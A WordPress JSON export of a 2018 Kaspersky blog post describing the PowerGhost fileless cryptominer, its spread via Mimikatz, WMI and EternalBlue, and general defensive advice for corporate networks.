{"id":11516,"date":"2018-07-30T10:08:01","date_gmt":"2018-07-30T14:08:01","guid":{"rendered":"https:\/\/me-en.kaspersky.com\/blog\/powerghost-fileless-miner\/11516\/"},"modified":"2019-11-15T15:22:56","modified_gmt":"2019-11-15T11:22:56","slug":"powerghost-fileless-miner","status":"publish","type":"post","link":"https:\/\/me-en.kaspersky.com\/blog\/powerghost-fileless-miner\/11516\/","title":{"rendered":"PowerGhost: Beware of ghost mining"},"content":{"rendered":"

Our experts recently discovered a miner<\/a> focused primarily on corporate networks. The fileless nature of PowerGhost allows the malware to attach itself to victims\u2019 workstations or servers without being noticed. Most of the attacks we\u2019ve registered so far have been in India, Turkey, Brazil, or Colombia.<\/p>\n

Having penetrated a company\u2019s infrastructure, PowerGhost tries to log in to network user accounts through the legitimate remote administration tool Windows Management Instrumentation (WMI). The malware obtains logins and passwords using a data extraction tool called Mimikatz. The miner can also be distributed through the EternalBlue exploit<\/a> for Windows, which was used by the creators of WannaCry<\/a> and ExPetr<\/a>. Theoretically, that vulnerability has been patched for a year, but it continues to work in practice.<\/p>\n

Once on victims\u2019 devices, the malware attempts to enhance its privileges through various OS vulnerabilities (see the Securelist blog post<\/a> for technical details). After that, the miner gains a foothold in the system and starts to earn cryptocurrency for its owners.<\/p>\n

Why is PowerGhost dangerous?<\/h2>\n

Like any miner, PowerGhost uses your computing resources to generate cryptocurrency. This reduces server and other device performance as well as significantly accelerates wear and tear, which leads to replacement costs.<\/p>\n

However, compared with most such programs, PowerGhost is more difficult to detect because it doesn\u2019t download malicious files to the device. And that means it can operate longer unnoticed on your server or workstation, and do more damage.<\/p>\n

What\u2019s more, in one version of the malware, our experts discovered a tool for DDoS attacks. The use of a company\u2019s servers to bombard another victim can slow down or even paralyze operation activities. An interesting trait is malware\u2019s ability to check if it is being run under a real operating system or in a sandbox, allowing it to bypass standard security solutions.<\/p>\n

PowerGhost-busters<\/h3>\n

To avoid infection and protect equipment from attack by PowerGhost and similar malware, you should carefully monitor the security of corporate networks.<\/p>\n

    \n
  • Don\u2019t skip software and operating system updates. All vulnerabilities exploited by the miner have long been patched by vendors. Virus writers tend to base their developments on exploits for long-patched vulnerabilities.<\/li>\n
  • Upgrade employee security awareness skills. Remember that many cyberincidents are caused by the human factor.<\/li>\n
  • Use reliable security solutions with behavioral analysis technology \u2014 that\u2019s the only way fileless threats can be caught. Kaspersky Lab\u2019s business products detect both PowerGhost and its individual components, as well as many other malicious programs, including ones currently unknown.<\/li>\n<\/ul>\n\n","protected":false},"excerpt":{"rendered":"

    Fileless malware infects workstations and servers in corporate networks.<\/p>\n","protected":false},"author":2484,"featured_media":11517,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1318,1917],"tags":[1849,1729,1819,1032,1768,1429,521],"class_list":{"0":"post-11516","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-business","8":"category-smb","9":"tag-bodiless-malware","10":"tag-cryptojacking","11":"tag-cryptomining","12":"tag-ddos","13":"tag-endpoint","14":"tag-miners","15":"tag-threats"},"hreflang":[{"hreflang":"en-ae","url":"https:\/\/me-en.kaspersky.com\/blog\/powerghost-fileless-miner\/11516\/"},{"hreflang":"en-in","url":"https:\/\/www.kaspersky.co.in\/blog\/powerghost-fileless-miner\/13753\/"},{"hreflang":"en-us","url":"https:\/\/usa.kaspersky.com\/blog\/powerghost-fileless-miner\/15815\/"},{"hreflang":"en-gb","url":"https:\/\/www.kaspersky.co.uk\/blog\/powerghost-fileless-miner\/14095\/"},{"hreflang":"es-mx","url":"https:\/\/latam.kaspersky.com\/blog\/powerghost-fileless-miner\/13220\/"},{"hreflang":"es","url":"https:\/\/www.kaspersky.es\/blog\/powerghost-fileless-miner\/16598\/"},{"hreflang":"it","url":"https:\/\/www.kaspersky.it\/blog\/powerghost-fileless-miner\/16030\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/powerghost-fileless-miner\/20963\/"},{"hreflang":"tr","url":"https:\/\/www.kaspersky.com.tr\/blog\/powerghost-fileless-miner\/5166\/"},{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/powerghost-fileless-miner\/23310\/"},{"hreflang":"fr","url":"https:\/\/www.kaspersky.fr\/blog\/powerghost-fileless-miner\/10782\/"},{"hreflang":"pt-br","url":"https:\/\/www.kaspersky.com.br\/blog\/powerghost-fileless-miner\/10561\/"},{"hreflang":"pl","url":"https:\/\/plblog.kaspersky.com\/powerghost-fileless-miner\/9531\/"},{"hreflang":"de","url":"https:\/\/www.kaspersky.de\/blog\/powerghost-fileless-miner\/17369\/"},{"hreflang":"ja","url":"https:\/\/blog.kaspersky.co.jp\/powerghost-fileless-miner\/20964\/"},{"hreflang":"nl","url":"https:\/\/www.kaspersky.nl\/blog\/powerghost-fileless-miner\/23714\/"},{"hreflang":"ru-kz","url":"https:\/\/blog.kaspersky.kz\/powerghost-fileless-miner\/17032\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/powerghost-fileless-miner\/20678\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/powerghost-fileless-miner\/20676\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/me-en.kaspersky.com\/blog\/tag\/threats\/","name":"threats"},"_links":{"self":[{"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/11516","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/users\/2484"}],"replies":[{"embeddable":true,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/comments?post=11516"}],"version-history":[{"count":6,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/11516\/revisions"}],"predecessor-version":[{"id":14642,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/11516\/revisions\/14642"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/media\/11517"}],"wp:attachment":[{"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/media?parent=11516"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/categories?post=11516"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/me-en.kaspersky.com\/blog\/wp-json\/wp\/v2\/tags?post=11516"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}